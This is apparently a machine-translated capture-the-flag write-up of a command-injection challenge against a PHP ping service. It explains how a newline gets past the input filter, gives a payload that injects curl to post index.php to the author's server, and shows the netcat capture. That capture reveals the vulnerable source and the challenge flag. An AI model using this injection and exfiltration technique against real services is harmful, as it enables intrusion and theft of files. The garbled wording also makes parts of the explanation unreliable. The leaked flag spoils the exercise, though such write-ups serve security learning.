Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
This service vulnerabilities found and exploited. It adds some protective measures. The sign is located in index.php file.
Two results:
the ping the ok
Common connectors:
& later whether true or false, will perform in front
&& false front is not performed behind the statement
| whether true or false statement will not perform in front of
the front || true, it will not be performed later
than invalid, % 0A available
here using sleep 60s judge behind the statement is executed
Using curl reads the index.php
payload: IP = 127.0.0.1% 0acurl `filename = -F * * * * @ index.php`:... 9999 --------------- ---- vps ip address
nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from challenge01.root-me.org 49010 received!
POST / HTTP/1.1
Host: *.*.*.*:9999
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 1008
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a
--------------------------0fee3a45749c037a
Content-Disposition: form-data; name="filename"; filename="index.php"
Content-Type: application/octet-stream
<html>
<head>
<title>Ping Service</title>
</head>
<body>
<form method="POST" action="index.php">
<input type="text" name="ip" placeholder="127.0.0.1">
<input type="submit">
</form>
<pre>
<?php
$flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
$response = @shell_exec("timeout 5 bash -c 'ping -c 3 ".$ip."'");
$receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);
if ($out[1]=="3")
{
echo "Ping OK";
}
elseif ($out[1]=="0")
{
echo "Ping NOK";
}
else
{
echo "Syntax Error";
}
}
?>
</pre>
</body>
</html>